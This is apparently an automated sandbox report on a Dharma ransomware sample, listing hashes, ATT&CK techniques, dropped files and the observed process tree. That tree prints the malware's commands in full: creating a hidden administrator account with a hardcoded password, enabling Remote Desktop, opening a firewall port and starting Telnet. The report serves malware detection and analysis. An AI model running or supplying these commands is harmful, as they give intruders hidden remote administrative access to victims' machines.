022728f678d8dcc6cba20147595ed4099e9c98be0582c0f67518d5664e3b8523

Resubmissions

03-03-2024 01:34

240303-by6ttsbe94 10

03-03-2024 01:31

240303-bxkj7sbe62 7

Analysis

max time kernel
150s
max time network
162s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
03-03-2024 01:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Ransomware/Dharma.exe
Size

11.5MB
MD5

928e37519022745490d1af1ce6f336f7
SHA1

b7840242393013f2c4c136ac7407e332be075702
SHA256

6fb303dd8ba36381948127d44bd8541e4a1ab8af07b46526ace08458f2498850
SHA512

8040195ab2b2e15c9d5ffa13a47a61c709738d1cf5e2108e848fedf3408e5bad5f2fc5f523f170f6a80cb33a4f5612d3d60dd343d028e55cfc08cd2f6ed2947c
SSDEEP

196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W

Score

9^/10

evasion persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

1280 netsh.exe
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

760 attrib.exe

pid	process
1280	netsh.exe

pid	process
760	attrib.exe

Sets service image path in registry 2 TTPs 13 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

mssql.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avlwumkczaykdcsqq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\avlwumkczaykdcsqq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wwvepuhpkeefrznwe\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\wwvepuhpkeefrznwe.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\tlibkondxlhtop\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\tlibkondxlhtop.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zynfurrumnoukfze\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\zynfurrumnoukfze.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\kbnzumuvlmtwwegy\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\kbnzumuvlmtwwegy.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ixqbnnowognzhjlht\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\ixqbnnowognzhjlht.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\ffqofwaowdrcbkq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\ffqofwaowdrcbkq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssqlaq\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssqlaq.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mssql\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\mssql.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lziubkqbxpxgapfh\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\lziubkqbxpxgapfh.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\zovrwlwpkpzuxyir\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\zovrwlwpkpzuxyir.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\jefylodblrmhnn\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\jefylodblrmhnn.sys"	mssql.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\cqfscigclyjjiec\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\Ransomware\\ac\\cqfscigclyjjiec.sys"	mssql.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Dharma.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation Dharma.exe
Executes dropped EXE 4 IoCs

Processes:

nc123.exemssql.exemssql2.exeSearchHost.exe

pid process

4244 nc123.exe
3356 mssql.exe
4676 mssql2.exe
2272 SearchHost.exe
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

SearchHost.exe

description ioc process

File opened (read-only) \??\D: SearchHost.exe
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

4320 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	Dharma.exe

pid	process
4244	nc123.exe
3356	mssql.exe
4676	mssql2.exe
2272	SearchHost.exe

description	ioc	process
File opened (read-only)	\??\D:	SearchHost.exe

pid	process
4320	sc.exe

Suspicious behavior: LoadsDriver 32 IoCs

Processes:

mssql.exe

pid	process
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe
3356	mssql.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

mssql.exemssql2.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeLoadDriverPrivilege	3356	mssql.exe
Token: SeDebugPrivilege	4676	mssql2.exe
Token: SeIncreaseQuotaPrivilege	552	WMIC.exe
Token: SeSecurityPrivilege	552	WMIC.exe
Token: SeTakeOwnershipPrivilege	552	WMIC.exe
Token: SeLoadDriverPrivilege	552	WMIC.exe
Token: SeSystemProfilePrivilege	552	WMIC.exe
Token: SeSystemtimePrivilege	552	WMIC.exe
Token: SeProfSingleProcessPrivilege	552	WMIC.exe
Token: SeIncBasePriorityPrivilege	552	WMIC.exe
Token: SeCreatePagefilePrivilege	552	WMIC.exe
Token: SeBackupPrivilege	552	WMIC.exe
Token: SeRestorePrivilege	552	WMIC.exe
Token: SeShutdownPrivilege	552	WMIC.exe
Token: SeDebugPrivilege	552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	552	WMIC.exe
Token: SeRemoteShutdownPrivilege	552	WMIC.exe
Token: SeUndockPrivilege	552	WMIC.exe
Token: SeManageVolumePrivilege	552	WMIC.exe
Token: 33	552	WMIC.exe
Token: 34	552	WMIC.exe
Token: 35	552	WMIC.exe
Token: 36	552	WMIC.exe
Token: SeIncreaseQuotaPrivilege	552	WMIC.exe
Token: SeSecurityPrivilege	552	WMIC.exe
Token: SeTakeOwnershipPrivilege	552	WMIC.exe
Token: SeLoadDriverPrivilege	552	WMIC.exe
Token: SeSystemProfilePrivilege	552	WMIC.exe
Token: SeSystemtimePrivilege	552	WMIC.exe
Token: SeProfSingleProcessPrivilege	552	WMIC.exe
Token: SeIncBasePriorityPrivilege	552	WMIC.exe
Token: SeCreatePagefilePrivilege	552	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

SearchHost.exe

pid process

2272 SearchHost.exe
Suspicious use of SendNotifyMessage 1 IoCs

Processes:

SearchHost.exe

pid process

2272 SearchHost.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

mssql.exemssql2.exeSearchHost.exe

pid process

3356 mssql.exe
3356 mssql.exe
4676 mssql2.exe
2272 SearchHost.exe
4676 mssql2.exe
3356 mssql.exe

pid	process
2272	SearchHost.exe

pid	process
2272	SearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Dharma.exenc123.execmd.execmd.exenet.exenet.execmd.exenet.exenet.exe

description	pid	process	target process
PID 828 wrote to memory of 4244	828	Dharma.exe	nc123.exe
PID 828 wrote to memory of 4244	828	Dharma.exe	nc123.exe
PID 828 wrote to memory of 4244	828	Dharma.exe	nc123.exe
PID 828 wrote to memory of 3356	828	Dharma.exe	mssql.exe
PID 828 wrote to memory of 3356	828	Dharma.exe	mssql.exe
PID 828 wrote to memory of 4676	828	Dharma.exe	mssql2.exe
PID 828 wrote to memory of 4676	828	Dharma.exe	mssql2.exe
PID 828 wrote to memory of 4676	828	Dharma.exe	mssql2.exe
PID 828 wrote to memory of 4320	828	Dharma.exe	cmd.exe
PID 828 wrote to memory of 4320	828	Dharma.exe	cmd.exe
PID 828 wrote to memory of 4320	828	Dharma.exe	cmd.exe
PID 828 wrote to memory of 3436	828	Dharma.exe	cmd.exe
PID 828 wrote to memory of 3436	828	Dharma.exe	cmd.exe
PID 828 wrote to memory of 3436	828	Dharma.exe	cmd.exe
PID 828 wrote to memory of 2272	828	Dharma.exe	SearchHost.exe
PID 828 wrote to memory of 2272	828	Dharma.exe	SearchHost.exe
PID 828 wrote to memory of 2272	828	Dharma.exe	SearchHost.exe
PID 4244 wrote to memory of 2100	4244	nc123.exe	cmd.exe
PID 4244 wrote to memory of 2100	4244	nc123.exe	cmd.exe
PID 4244 wrote to memory of 2100	4244	nc123.exe	cmd.exe
PID 3436 wrote to memory of 3508	3436	cmd.exe	cmd.exe
PID 3436 wrote to memory of 3508	3436	cmd.exe	cmd.exe
PID 3436 wrote to memory of 3508	3436	cmd.exe	cmd.exe
PID 3508 wrote to memory of 552	3508	cmd.exe	WMIC.exe
PID 3508 wrote to memory of 552	3508	cmd.exe	WMIC.exe
PID 3508 wrote to memory of 552	3508	cmd.exe	WMIC.exe
PID 3508 wrote to memory of 4164	3508	cmd.exe	find.exe
PID 3508 wrote to memory of 4164	3508	cmd.exe	find.exe
PID 3508 wrote to memory of 4164	3508	cmd.exe	find.exe
PID 3436 wrote to memory of 1152	3436	cmd.exe	net.exe
PID 3436 wrote to memory of 1152	3436	cmd.exe	net.exe
PID 3436 wrote to memory of 1152	3436	cmd.exe	net.exe
PID 1152 wrote to memory of 4624	1152	net.exe	net1.exe
PID 1152 wrote to memory of 4624	1152	net.exe	net1.exe
PID 1152 wrote to memory of 4624	1152	net.exe	net1.exe
PID 3436 wrote to memory of 2756	3436	cmd.exe	net.exe
PID 3436 wrote to memory of 2756	3436	cmd.exe	net.exe
PID 3436 wrote to memory of 2756	3436	cmd.exe	net.exe
PID 2756 wrote to memory of 3656	2756	net.exe	net1.exe
PID 2756 wrote to memory of 3656	2756	net.exe	net1.exe
PID 2756 wrote to memory of 3656	2756	net.exe	net1.exe
PID 3436 wrote to memory of 1032	3436	cmd.exe	cmd.exe
PID 3436 wrote to memory of 1032	3436	cmd.exe	cmd.exe
PID 3436 wrote to memory of 1032	3436	cmd.exe	cmd.exe
PID 1032 wrote to memory of 3120	1032	cmd.exe	WMIC.exe
PID 1032 wrote to memory of 3120	1032	cmd.exe	WMIC.exe
PID 1032 wrote to memory of 3120	1032	cmd.exe	WMIC.exe
PID 1032 wrote to memory of 1048	1032	cmd.exe	find.exe
PID 1032 wrote to memory of 1048	1032	cmd.exe	find.exe
PID 1032 wrote to memory of 1048	1032	cmd.exe	find.exe
PID 3436 wrote to memory of 4924	3436	cmd.exe	net.exe
PID 3436 wrote to memory of 4924	3436	cmd.exe	net.exe
PID 3436 wrote to memory of 4924	3436	cmd.exe	net.exe
PID 4924 wrote to memory of 1460	4924	net.exe	net1.exe
PID 4924 wrote to memory of 1460	4924	net.exe	net1.exe
PID 4924 wrote to memory of 1460	4924	net.exe	net1.exe
PID 3436 wrote to memory of 3136	3436	cmd.exe	net.exe
PID 3436 wrote to memory of 3136	3436	cmd.exe	net.exe
PID 3436 wrote to memory of 3136	3436	cmd.exe	net.exe
PID 3136 wrote to memory of 4448	3136	net.exe	net1.exe
PID 3136 wrote to memory of 4448	3136	net.exe	net1.exe
PID 3136 wrote to memory of 4448	3136	net.exe	net1.exe
PID 3436 wrote to memory of 4836	3436	cmd.exe	reg.exe
PID 3436 wrote to memory of 4836	3436	cmd.exe	reg.exe

Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

760 attrib.exe

pid	process
760	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\Dharma.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:828

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4244

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cls
3⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe"
2⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3356

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat" "
2⤵
PID:4320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:3436

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
3⤵
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Windows\SysWOW64\find.exe
Find "="
4⤵
PID:4164

C:\Windows\SysWOW64\net.exe
net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
3⤵
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
4⤵
PID:4624

C:\Windows\SysWOW64\net.exe
net localgroup Administrators systembackup /add
3⤵
- Suspicious use of WriteProcessMemory
PID:2756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators systembackup /add
4⤵
PID:3656

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
3⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\SysWOW64\Wbem\WMIC.exe
WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
4⤵
PID:3120

C:\Windows\SysWOW64\find.exe
Find "="
4⤵
PID:1048

C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" systembackup /add
3⤵
- Suspicious use of WriteProcessMemory
PID:4924

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
4⤵
PID:1460

C:\Windows\SysWOW64\net.exe
net accounts /forcelogoff:no /maxpwage:unlimited
3⤵
- Suspicious use of WriteProcessMemory
PID:3136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
4⤵
PID:4448

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
3⤵
PID:4836

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
3⤵
PID:112

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
3⤵
PID:1220

C:\Windows\SysWOW64\attrib.exe
attrib C:\users\systembackup +r +a +s +h
3⤵
- Sets file to hidden
- Views/modifies file attributes
PID:760

C:\Windows\SysWOW64\netsh.exe
netsh firewall add portopening TCP 3389 "Remote Desktop"
3⤵
- Modifies Windows Firewall
PID:1280

C:\Windows\SysWOW64\sc.exe
sc config tlntsvr start=auto
3⤵
- Launches sc.exe
PID:4320

C:\Windows\SysWOW64\net.exe
net start Telnet
3⤵
PID:1224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start Telnet
4⤵
PID:1168

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
"C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe"
2⤵
- Executes dropped EXE
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3740 --field-trial-handle=2676,i,447940133669489189,1353734109898858672,262144 --variations-seed-version /prefetch:8
1⤵
PID:400

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Account Manipulation

T1098

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\Everything.ini
Filesize
19KB

MD5
5531bbb8be242dfc9950f2c2c8aa0058

SHA1
b08aadba390b98055c947dce8821e9e00b7d01ee

SHA256
4f03ab645fe48bf3783eb58568e89b3b3401956dd17cb8049444058dab0634d7

SHA512
3ce7e1d7b330cc9d75c3ce6d4531afe6bfa210a0bcbb45d4a7c29aabff79bebf3263fe0b5377956e2f88036b466383f001a7a6713da04a411b1aceb42bc38291

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
480KB

MD5
b7b2c704cb9a6dab57fd2fdbf4dd31e7

SHA1
764b2b044067222d83837a896841cad7cee247de

SHA256
37d1efc7a9232d6274121d75c93b20e529ca90c99462ff3466cc2b524be222da

SHA512
735206116ba8de55920493c0b9e8fa979e27812822c0ba55a5bce32c20e488627e49973db8c3043c3c97b60ee61ee283980310da7940b00ab21f14c0538678ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
243KB

MD5
501b963083b286b16a003a24f4bd76c5

SHA1
6e834bdb4c0dcddde1fd1b704a2f54c2ab731d95

SHA256
683f9d814604725c4944186b92d1068f90f33335554da26288c4a81bd340b461

SHA512
4f29653920eef4e37a5da417ede58cbb245d363070bc8c2ce24415ce1846dda54d5e594385cfec0b626bcd17be89a2061d785fd719c141bfe2f435580fdd181a

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\EVER\SearchHost.exe
Filesize
412KB

MD5
12b7638b2a274ef1ae55dfd4ed6f9354

SHA1
f08e98f910bfe9a77ff5e99a0c97b757aee41ed9

SHA256
8c741704ebf5fbcbae1552eb1a286694dff555b890ddeedd59e014a5a94d482e

SHA512
43e9e148f4f1c5203fb1798c168fabcf212a23f7f5f072e7213d5000af05efc8f50eac6ec4998d35e528dadc2800cc457e2c084cb25b77a208dd1ec5abc9fcbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\Shadow.bat
Filesize
28B

MD5
df8394082a4e5b362bdcb17390f6676d

SHA1
5750248ff490ceec03d17ee9811ac70176f46614

SHA256
da3f155cfb98ce0add29a31162d23da7596da44ba2391389517fe1a2790da878

SHA512
8ce519dc5c2dd0bbb9f7f48bedf01362c56467800ac0029c8011ee5d9d19e3b3f2eff322e7306acf693e2edb9cf75caaf7b85eb8b2b6c3101ff7e1644950303d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\avlwumkczaykdcsqq.sys
Filesize
674KB

MD5
b2233d1efb0b7a897ea477a66cd08227

SHA1
835a198a11c9d106fc6aabe26b9b3e59f6ec68fd

SHA256
5fd17e3b8827b5bb515343bc4066be0814f6466fb4294501becac284a378c0da

SHA512
6ca61854db877d767ce587ac3d7526cda8254d937a159fd985e0475d062d07ae83e7ff4f9f42c7e1e1cad5e1f408f6849866aa4e9e48b29d80510e5c695cee37

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
128KB

MD5
ab10c6bfb35da469a340d08eee76c3cd

SHA1
08be3cfa8799cbba1edbc107b74f0cf2f724df76

SHA256
d6ecb87472936f887517b0f839cba5596bec79a7ada495b665a387ccd1e71eb3

SHA512
f87c91347f014253088bfeb95a90162c4e365d0e1e38a54b409822636ac6bad98bf0c14d6de609c4aa177c41d7ca6001443f87c3d3005b26eb8de501b2be672c

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
2.8MB

MD5
6ca66d65f5829dcacf8dfa5f62d7181b

SHA1
24861e380b5797f9cf5f904ec23a5623a84837ce

SHA256
39a396a348fb5a14f40490efa5e777cf5c1a4a8af665585a0e93fd562f81aa99

SHA512
6e74d1cdfccca96ea9c5bc082ee42edc710daee6cd13783ed0547a22877f3a3cea913918c359eb99c0cc77da8cafba7e27ea374efe0e26cbf8b6580c0dad75ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql.exe
Filesize
2.7MB

MD5
2b71b7bc75c16670caca19b23d7f7c5e

SHA1
61d2e02713538247a92ec151c5cf091995c9bccb

SHA256
066067ce313827160f711dc79cc5214f1dadb851a92970622505ea56ff8568e7

SHA512
1c6a8f7f7ce8bef72425ccbc8088ee97f5d17bacb7ba28e376709d56dcc671f3ca489c3b9c2369ffb77a4ab8d58b04af379c564411f146608103ec4e8fd37eaa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
2.0MB

MD5
dc7230ddb4dbd7b7a77fe9c57ba185d7

SHA1
3704416b2d1f885aa559af0dc834b32b8c38bb89

SHA256
7372f1a78cbb52efc372761f64d978dc533f034d18eec1ccaf07fcf206df3515

SHA512
f5afacc012095a5943aa0618a2f81b7645713bfd47415f8b3e270d161f564eee49b6793dea42dd37507436c5a5864d5d6d0a5bd428bf7292a5c24bd7ff5b7fdc

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
1.4MB

MD5
b0519497fe8f9dfaceb6ff3c55a2260b

SHA1
5fed3f2cbb839b92fccc3b0356be3ffd4ee3a754

SHA256
faa0954f8a5909d0cc18c94d086b7320897d37ef5ae97072bab6ad702ad846ac

SHA512
17eb47a53cdb87a8cbb5108e18a673a1af436b84e03b5c4419172fd4cb184b13895f8c2ffcc921135d57420b71269cec6d6bb9d6ae00b3d6e1e116c6fe8a0d34

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\mssql2.exe
Filesize
1.2MB

MD5
fdba31c6efa076fc6ec5c1fc72eb19fc

SHA1
c7c7bb63d95b1241cc2d39955521f070312ef242

SHA256
c7c9f2d1991495091a0478961ad85fb97deab24e756009b097bebfb50d183efe

SHA512
ad8aa88282fcd03da95ebf969062963619cacec3d7c1f64998894d1bb23cb7fca2046cd74ca9f79391ed9b03f5dda7fdef177ce2c2c9045ec0a068ec7079a9c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\nc123.exe
Filesize
125KB

MD5
597de376b1f80c06d501415dd973dcec

SHA1
629c9649ced38fd815124221b80c9d9c59a85e74

SHA256
f47e3555461472f23ab4766e4d5b6f6fd260e335a6abc31b860e569a720a5446

SHA512
072565912208e97cc691e1a102e32fd6c243b5a3f8047a159e97aabbe302bddc36f3c52cecde3b506151bc89e0f3b5acf6552a82d83dac6e0180c873d36d3f6b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Ransomware\ac\systembackup.bat
Filesize
1KB

MD5
b4b2f1a6c7a905781be7d877487fc665

SHA1
7ee27672d89940e96bcb7616560a4bef8d8af76c

SHA256
6246b0045ca11da483e38317421317dc22462a8d81e500dee909a5269c086b5f

SHA512
f883cea56a9ac5dcb838802753770494ce7b1de9d7da6a49b878d534810f9c87170f04e0b8b516ae19b9492f40635a72b3e8a4533d39312383c520abe00c5ae6

Download Submit
\??\PIPE\lsarpc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/3356-164-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/3356-174-0x0000000140000000-0x0000000140ACB000-memory.dmp

Filesize
10.8MB

Download
memory/4676-114-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/4676-160-0x0000000076500000-0x00000000765F0000-memory.dmp

Filesize
960KB

Download
memory/4676-165-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
memory/4676-172-0x0000000000400000-0x0000000000B02000-memory.dmp

Filesize
7.0MB

Download
